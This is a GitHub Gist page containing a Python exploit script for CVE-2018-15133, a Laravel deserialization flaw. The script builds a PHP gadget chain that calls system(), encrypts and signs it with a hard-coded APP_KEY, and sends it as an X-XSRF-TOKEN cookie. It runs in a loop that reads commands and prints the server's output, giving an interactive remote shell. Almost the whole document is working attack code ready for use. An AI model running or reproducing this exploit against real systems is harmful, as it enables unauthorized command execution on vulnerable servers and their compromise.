Last active
July 6, 2020 09:48
-
-
Save frankli0324/e39fcb03c9c22fa43636442a1d97e016 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hmac | |
| import json | |
| from base64 import b64encode, b64decode | |
| from Crypto import Random | |
| from Crypto.Cipher import AES | |
| from Crypto.Util.Padding import pad | |
| from phpserialize import * | |
| from requests import session | |
| ses = session() | |
| ''' | |
| CVE-2018-15133 implemented by Frank | |
| pip3 install pycryptodome libphpserialize | |
| ''' | |
| APP_KEY = 'P5tGTBKV2clEGWCWD7L5fSrhi8sfnX/cmHdqzx/fpVo=' | |
| TARGET = 'http://localhost' | |
| # write your own POP chain below | |
| @namespace('Faker') | |
| class Generator: | |
| protected_formatters = {'dispatch': 'system'} | |
| @namespace('Illuminate\\Broadcasting') | |
| class PendingBroadcast: | |
| def __init__(self, cmd='whoami'): | |
| self.protected_event = cmd | |
| self.protected_events = Generator() | |
| def get_payload(cmd): | |
| key = b64decode(APP_KEY) | |
| data = pad(serialize(PendingBroadcast(cmd)).encode(), 16) | |
| iv = b64encode(Random.new().read(AES.block_size)) | |
| res = b64encode(AES.new(key, AES.MODE_CBC, b64decode(iv)).encrypt(data)) | |
| mac = hmac.new(key, iv + res, 'sha256').hexdigest() | |
| payload = b64encode(json.dumps({ | |
| 'iv': iv.decode(), 'value': res.decode(), 'mac': mac | |
| }).encode()).decode() | |
| return payload | |
| while True: | |
| ''' | |
| under most circumstances, this should be | |
| headers={ | |
| 'X-XSRF-TOKEN': get_payload(input()) | |
| } | |
| ''' | |
| print(ses.get(TARGET, cookies={ | |
| 'X-XSRF-TOKEN': get_payload(input()) | |
| }).text[10:]) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment